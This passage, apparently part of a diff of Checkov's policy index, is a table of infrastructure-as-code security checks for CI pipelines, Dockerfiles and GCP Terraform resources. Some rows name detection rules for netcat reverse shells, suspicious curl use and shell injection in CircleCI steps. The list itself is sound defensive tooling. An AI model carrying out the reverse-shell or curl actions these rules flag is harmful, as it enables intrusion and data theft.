[SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) | -| 2087 | CKV_AZUREPIPELINES_5 | azure_pipelines | *.container[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | 
[DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2088 | CKV_AZUREPIPELINES_5 | azure_pipelines | jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2089 | CKV_AZUREPIPELINES_5 | azure_pipelines | stages[].jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) | -| 2090 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) | -| 2091 | CKV_BITBUCKET_1 | bitbucket_configuration | * | Merge requests should require at least 2 approvals | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py) | -| 2092 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | [{image:image,__startline__:__startline__,__endline__:__endline__}] | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2093 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2094 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.default[].step.{image: image, __startline__: 
__startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) | -| 2095 | CKV_CIRCLECIPIPELINES_1 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | circleci_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py) | -| 2096 | CKV_CIRCLECIPIPELINES_2 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image version is referenced via hash not arbitrary tag. | circleci_pipelines | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py) | -| 2097 | CKV_CIRCLECIPIPELINES_3 | circleci_pipelines | orbs.{orbs: @} | Ensure mutable development orbs are not used. | circleci_pipelines | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py) | -| 2098 | CKV_CIRCLECIPIPELINES_4 | circleci_pipelines | orbs.{orbs: @} | Ensure unversioned volatile orbs are not used. 
| circleci_pipelines | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py) | -| 2099 | CKV_CIRCLECIPIPELINES_5 | circleci_pipelines | jobs.*.steps[] | Suspicious use of netcat with IP address | circleci_pipelines | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py) | -| 2100 | CKV_CIRCLECIPIPELINES_6 | circleci_pipelines | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | circleci_pipelines | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py) | -| 2101 | CKV_CIRCLECIPIPELINES_7 | circleci_pipelines | jobs.*.steps[] | Suspicious use of curl in run task | circleci_pipelines | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py) | -| 2102 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | -| 2103 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) | -| 2104 | CKV_DIO_1 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket has versioning enabled | Terraform | [SpacesBucketVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketVersioning.py) | -| 2105 | CKV_DIO_2 | resource | 
digitalocean_droplet | Ensure the droplet specifies an SSH key | Terraform | [DropletSSHKeys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/DropletSSHKeys.py) | -| 2106 | CKV_DIO_3 | resource | digitalocean_spaces_bucket | Ensure the Spaces bucket is private | Terraform | [SpacesBucketPublicRead.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/SpacesBucketPublicRead.py) | -| 2107 | CKV_DIO_4 | resource | digitalocean_firewall | Ensure the firewall ingress is not wide open | Terraform | [FirewallIngressOpen.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/digitalocean/FirewallIngressOpen.py) | -| 2108 | CKV_DOCKER_1 | dockerfile | EXPOSE | Ensure port 22 is not exposed | dockerfile | [ExposePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ExposePort22.py) | -| 2109 | CKV_DOCKER_2 | dockerfile | * | Ensure that HEALTHCHECK instructions have been added to container images | dockerfile | [HealthcheckExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/HealthcheckExists.py) | -| 2110 | CKV_DOCKER_3 | dockerfile | * | Ensure that a user for the container has been created | dockerfile | [UserExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UserExists.py) | -| 2111 | CKV_DOCKER_4 | dockerfile | ADD | Ensure that COPY is used instead of ADD in Dockerfiles | dockerfile | [AddExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AddExists.py) | -| 2112 | CKV_DOCKER_5 | dockerfile | RUN | Ensure update instructions are not use alone in the Dockerfile | dockerfile | [UpdateNotAlone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/UpdateNotAlone.py) | -| 2113 | CKV_DOCKER_6 | dockerfile | MAINTAINER | Ensure that LABEL maintainer is used instead of MAINTAINER 
(deprecated) | dockerfile | [MaintainerExists.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/MaintainerExists.py) |
-| 2114 | CKV_DOCKER_7 | dockerfile | FROM | Ensure the base image uses a non latest version tag | dockerfile | [ReferenceLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/ReferenceLatestTag.py) |
-| 2115 | CKV_DOCKER_8 | dockerfile | USER | Ensure the last USER is not root | dockerfile | [RootUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RootUser.py) |
-| 2116 | CKV_DOCKER_9 | dockerfile | RUN | Ensure that APT isn't used | dockerfile | [RunUsingAPT.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/RunUsingAPT.py) |
-| 2117 | CKV_DOCKER_10 | dockerfile | WORKDIR | Ensure that WORKDIR values are absolute paths | dockerfile | [WorkdirIsAbsolute.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/WorkdirIsAbsolute.py) |
-| 2118 | CKV_DOCKER_11 | dockerfile | FROM | Ensure From Alias are unique for multistage builds. | dockerfile | [AliasIsUnique.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/AliasIsUnique.py) |
-| 2119 | CKV2_DOCKER_1 | resource | RUN | Ensure that sudo isn't used | dockerfile | [RunUsingSudo.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUsingSudo.yaml) |
-| 2120 | CKV2_DOCKER_2 | resource | RUN | Ensure that certificate validation isn't disabled with curl | dockerfile | [RunUnsafeCurl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeCurl.yaml) |
-| 2121 | CKV2_DOCKER_3 | resource | RUN | Ensure that certificate validation isn't disabled with wget | dockerfile | [RunUnsafeWget.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunUnsafeWget.yaml) |
-| 2122 | CKV2_DOCKER_4 | resource | RUN | Ensure that certificate validation isn't disabled with the pip '--trusted-host' option | dockerfile | [RunPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunPipTrustedHost.yaml) |
-| 2123 | CKV2_DOCKER_5 | resource | ARG | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
-| 2124 | CKV2_DOCKER_5 | resource | ENV | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
-| 2125 | CKV2_DOCKER_5 | resource | RUN | Ensure that certificate validation isn't disabled with the PYTHONHTTPSVERIFY environmnet variable | dockerfile | [EnvPythonHttpsVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPythonHttpsVerify.yaml) |
-| 2126 | CKV2_DOCKER_6 | resource | ARG | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
-| 2127 | CKV2_DOCKER_6 | resource | ENV | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
-| 2128 | CKV2_DOCKER_6 | resource | RUN | Ensure that certificate validation isn't disabled with the NODE_TLS_REJECT_UNAUTHORIZED environmnet variable | dockerfile | [EnvNodeTlsRejectUnauthorized.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNodeTlsRejectUnauthorized.yaml) |
-| 2129 | CKV2_DOCKER_7 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apk via the '--allow-untrusted' option | dockerfile | [RunApkAllowUntrusted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunApkAllowUntrusted.yaml) |
-| 2130 | CKV2_DOCKER_8 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by apt-get via the '--allow-unauthenticated' option | dockerfile | [RunAptGetAllowUnauthenticated.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetAllowUnauthenticated.yaml) |
-| 2131 | CKV2_DOCKER_9 | resource | RUN | Ensure that packages with untrusted or missing GPG signatures are not used by dnf, tdnf, or yum via the '--nogpgcheck' option | dockerfile | [RunYumNoGpgCheck.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumNoGpgCheck.yaml) |
-| 2132 | CKV2_DOCKER_10 | resource | RUN | Ensure that packages with untrusted or missing signatures are not used by rpm via the '--nodigest', '--nosignature', '--noverify', or '--nofiledigest' options | dockerfile | [RunRpmNoSignature.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunRpmNoSignature.yaml) |
-| 2133 | CKV2_DOCKER_11 | resource | RUN | Ensure that the '--force-yes' option is not used, as it disables signature validation and allows packages to be downgraded which can leave the system in a broken or inconsistent state | dockerfile | [RunAptGetForceYes.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunAptGetForceYes.yaml) |
-| 2134 | CKV2_DOCKER_12 | resource | ARG | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
-| 2135 | CKV2_DOCKER_12 | resource | ENV | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
-| 2136 | CKV2_DOCKER_12 | resource | RUN | Ensure that certificate validation isn't disabled for npm via the 'NPM_CONFIG_STRICT_SSL' environmnet variable | dockerfile | [EnvNpmConfigStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvNpmConfigStrictSsl.yaml) |
-| 2137 | CKV2_DOCKER_13 | resource | RUN | Ensure that certificate validation isn't disabled for npm or yarn by setting the option strict-ssl to false | dockerfile | [RunNpmConfigSetStrictSsl.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunNpmConfigSetStrictSsl.yaml) |
-| 2138 | CKV2_DOCKER_14 | resource | ARG | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
-| 2139 | CKV2_DOCKER_14 | resource | ENV | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
-| 2140 | CKV2_DOCKER_14 | resource | RUN | Ensure that certificate validation isn't disabled for git by setting the environment variable 'GIT_SSL_NO_VERIFY' to any value | dockerfile | [EnvGitSslNoVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvGitSslNoVerify.yaml) |
-| 2141 | CKV2_DOCKER_15 | resource | RUN | Ensure that the yum and dnf package managers are not configured to disable SSL certificate validation via the 'sslverify' configuration option | dockerfile | [RunYumConfigManagerSslVerify.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunYumConfigManagerSslVerify.yaml) |
-| 2142 | CKV2_DOCKER_16 | resource | ARG | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
-| 2143 | CKV2_DOCKER_16 | resource | ENV | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
-| 2144 | CKV2_DOCKER_16 | resource | RUN | Ensure that certificate validation isn't disabled with pip via the 'PIP_TRUSTED_HOST' environment variable | dockerfile | [EnvPipTrustedHost.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/EnvPipTrustedHost.yaml) |
-| 2145 | CKV2_DOCKER_17 | resource | RUN | Ensure that 'chpasswd' is not used to set or remove passwords | dockerfile | [RunChpasswd.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/dockerfile/checks/graph_checks/RunChpasswd.yaml) |
-| 2146 | CKV_GCP_1 | resource | google_container_cluster | Ensure Stackdriver Logging is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEClusterLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClusterLogging.py) |
-| 2147 | CKV_GCP_2 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted ssh access | Terraform | [GoogleComputeFirewallUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress22.py) |
-| 2148 | CKV_GCP_3 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted rdp access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3389.py) |
-| 2149 | CKV_GCP_4 | resource | google_compute_ssl_policy | Ensure no HTTPS or SSL proxy load balancers permit SSL policies with weak cipher suites | Terraform | [GoogleComputeSSLPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSSLPolicy.py) |
-| 2150 | CKV_GCP_6 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance requires all incoming connections to use SSL | Terraform | [GoogleCloudSqlDatabaseRequireSsl.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabaseRequireSsl.py) |
-| 2151 | CKV_GCP_7 | resource | google_container_cluster | Ensure Legacy Authorization is set to Disabled on Kubernetes Engine Clusters | Terraform | [GKEDisableLegacyAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDisableLegacyAuth.py) |
-| 2152 | CKV_GCP_8 | resource | google_container_cluster | Ensure Stackdriver Monitoring is set to Enabled on Kubernetes Engine Clusters | Terraform | [GKEMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMonitoringEnabled.py) |
-| 2153 | CKV_GCP_9 | resource | google_container_node_pool | Ensure 'Automatic node repair' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoRepairEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoRepairEnabled.py) |
-| 2154 | CKV_GCP_10 | resource | google_container_node_pool | Ensure 'Automatic node upgrade' is enabled for Kubernetes Clusters | Terraform | [GKENodePoolAutoUpgradeEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENodePoolAutoUpgradeEnabled.py) |
-| 2155 | CKV_GCP_11 | resource | google_sql_database_instance | Ensure that Cloud SQL database Instances are not open to the world | Terraform | [GoogleCloudSqlDatabasePubliclyAccessible.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlDatabasePubliclyAccessible.py) |
-| 2156 | CKV_GCP_12 | resource | google_container_cluster | Ensure Network Policy is enabled on Kubernetes Engine Clusters | Terraform | [GKENetworkPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKENetworkPolicyEnabled.py) |
-| 2157 | CKV_GCP_13 | resource | google_container_cluster | Ensure client certificate authentication to Kubernetes Engine Clusters is disabled | Terraform | [GKEClientCertificateDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEClientCertificateDisabled.py) |
-| 2158 | CKV_GCP_14 | resource | google_sql_database_instance | Ensure all Cloud SQL database instance have backup configuration enabled | Terraform | [GoogleCloudSqlBackupConfiguration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlBackupConfiguration.py) |
-| 2159 | CKV_GCP_15 | resource | google_bigquery_dataset | Ensure that BigQuery datasets are not anonymously or publicly accessible | Terraform | [GoogleBigQueryDatasetPublicACL.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleBigQueryDatasetPublicACL.py) |
-| 2160 | CKV_GCP_16 | resource | google_dns_managed_zone | Ensure that DNSSEC is enabled for Cloud DNS | Terraform | [GoogleCloudDNSSECEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSSECEnabled.py) |
-| 2161 | CKV_GCP_17 | resource | google_dns_managed_zone | Ensure that RSASHA1 is not used for the zone-signing and key-signing keys in Cloud DNS DNSSEC | Terraform | [GoogleCloudDNSKeySpecsRSASHA1.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudDNSKeySpecsRSASHA1.py) |
-| 2162 | CKV_GCP_18 | resource | google_container_cluster | Ensure GKE Control Plane is not public | Terraform | [GKEPublicControlPlane.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPublicControlPlane.py) |
-| 2163 | CKV_GCP_19 | resource | google_container_cluster | Ensure GKE basic auth is disabled | Terraform | [GKEBasicAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBasicAuth.py) |
-| 2164 | CKV_GCP_20 | resource | google_container_cluster | Ensure master authorized networks is set to enabled in GKE clusters | Terraform | [GKEMasterAuthorizedNetworksEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMasterAuthorizedNetworksEnabled.py) |
-| 2165 | CKV_GCP_21 | resource | google_container_cluster | Ensure Kubernetes Clusters are configured with Labels | Terraform | [GKEHasLabels.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEHasLabels.py) |
-| 2166 | CKV_GCP_22 | resource | google_container_node_pool | Ensure Container-Optimized OS (cos) is used for Kubernetes Engine Clusters Node image | Terraform | [GKEUseCosImage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEUseCosImage.py) |
-| 2167 | CKV_GCP_23 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Alias IP ranges enabled | Terraform | [GKEAliasIpEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEAliasIpEnabled.py) |
-| 2168 | CKV_GCP_24 | resource | google_container_cluster | Ensure PodSecurityPolicy controller is enabled on the Kubernetes Engine Clusters | Terraform | [GKEPodSecurityPolicyEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPodSecurityPolicyEnabled.py) |
-| 2169 | CKV_GCP_25 | resource | google_container_cluster | Ensure Kubernetes Cluster is created with Private cluster enabled | Terraform | [GKEPrivateClusterConfig.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateClusterConfig.py) |
-| 2170 | CKV_GCP_26 | resource | google_compute_subnetwork | Ensure that VPC Flow Logs is enabled for every subnet in a VPC Network | Terraform | [GoogleSubnetworkLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkLoggingEnabled.py) |
-| 2171 | CKV_GCP_27 | resource | google_project | Ensure that the default network does not exist in a project | Terraform | [GoogleProjectDefaultNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectDefaultNetwork.py) |
-| 2172 | CKV_GCP_28 | resource | google_storage_bucket_iam_binding | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
-| 2173 | CKV_GCP_28 | resource | google_storage_bucket_iam_member | Ensure that Cloud Storage bucket is not anonymously or publicly accessible | Terraform | [GoogleStorageBucketNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketNotPublic.py) |
-| 2174 | CKV_GCP_29 | resource | google_storage_bucket | Ensure that Cloud Storage buckets have uniform bucket-level access enabled | Terraform | [GoogleStorageBucketUniformAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStorageBucketUniformAccess.py) |
-| 2175 | CKV_GCP_30 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
-| 2176 | CKV_GCP_30 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
-| 2177 | CKV_GCP_30 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account | Terraform | [GoogleComputeDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccount.py) |
-| 2178 | CKV_GCP_31 | resource | google_compute_instance | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
-| 2179 | CKV_GCP_31 | resource | google_compute_instance_from_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
-| 2180 | CKV_GCP_31 | resource | google_compute_instance_template | Ensure that instances are not configured to use the default service account with full access to all Cloud APIs | Terraform | [GoogleComputeDefaultServiceAccountFullAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDefaultServiceAccountFullAccess.py) |
-| 2181 | CKV_GCP_32 | resource | google_compute_instance | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
-| 2182 | CKV_GCP_32 | resource | google_compute_instance_from_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
-| 2183 | CKV_GCP_32 | resource | google_compute_instance_template | Ensure 'Block Project-wide SSH keys' is enabled for VM instances | Terraform | [GoogleComputeBlockProjectSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBlockProjectSSH.py) |
-| 2184 | CKV_GCP_33 | resource | google_compute_project_metadata | Ensure oslogin is enabled for a Project | Terraform | [GoogleComputeProjectOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeProjectOSLogin.py) |
-| 2185 | CKV_GCP_34 | resource | google_compute_instance | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
-| 2186 | CKV_GCP_34 | resource | google_compute_instance_from_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
-| 2187 | CKV_GCP_34 | resource | google_compute_instance_template | Ensure that no instance in the project overrides the project setting for enabling OSLogin(OSLogin needs to be enabled in project metadata for all instances) | Terraform | [GoogleComputeInstanceOSLogin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeInstanceOSLogin.py) |
-| 2188 | CKV_GCP_35 | resource | google_compute_instance | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
-| 2189 | CKV_GCP_35 | resource | google_compute_instance_from_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
